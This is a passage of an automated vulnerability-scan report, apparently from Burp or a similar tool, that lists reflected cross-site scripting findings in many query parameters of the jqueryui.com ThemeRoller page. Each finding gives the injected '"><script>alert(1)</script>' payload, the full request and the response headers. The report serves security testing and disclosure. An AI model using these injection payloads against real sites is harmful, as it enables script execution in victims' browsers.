ng&bgImgOpacityError=95&borderColorError=cd0a0aa9875"><script>alert(1)</script>ed090a1eadc&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0fc0"><script>alert(1)</script>1c9dbf1a53a was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7c0fc0"><script>alert(1)</script>1c9dbf1a53a&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b3c6"><script>alert(1)</script>fbf0392ad7e was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e5b3c6"><script>alert(1)</script>fbf0392ad7e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bc9"><script>alert(1)</script>0a3d7e23c38 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7e3bc9"><script>alert(1)</script>0a3d7e23c38&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b897e"><script>alert(1)</script>ffc301760e9 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxb897e"><script>alert(1)</script>ffc301760e9&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62820"><script>alert(1)</script>cb7327678f9 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px62820"><script>alert(1)</script>cb7327678f9 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bcb5"><script>alert(1)</script>11892851d8d was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e170099bcb5"><script>alert(1)</script>11892851d8d&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8019d"><script>alert(1)</script>93ec095a1b8 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=2222228019d"><script>alert(1)</script>93ec095a1b8&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a64"><script>alert(1)</script>d6e8cc4be07 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e59a64"><script>alert(1)</script>d6e8cc4be07&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1cbd"><script>alert(1)</script>c9eff2d2687 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac1cbd"><script>alert(1)</script>c9eff2d2687&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52361"><script>alert(1)</script>1f81954189a was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff52361"><script>alert(1)</script>1f81954189a&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87309"><script>alert(1)</script>45cc4a066c2 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=36363687309"><script>alert(1)</script>45cc4a066c2&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4380f"><script>alert(1)</script>962bd0de158 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d59874380f"><script>alert(1)</script>962bd0de158&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d1e"><script>alert(1)</script>6798d84993f was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
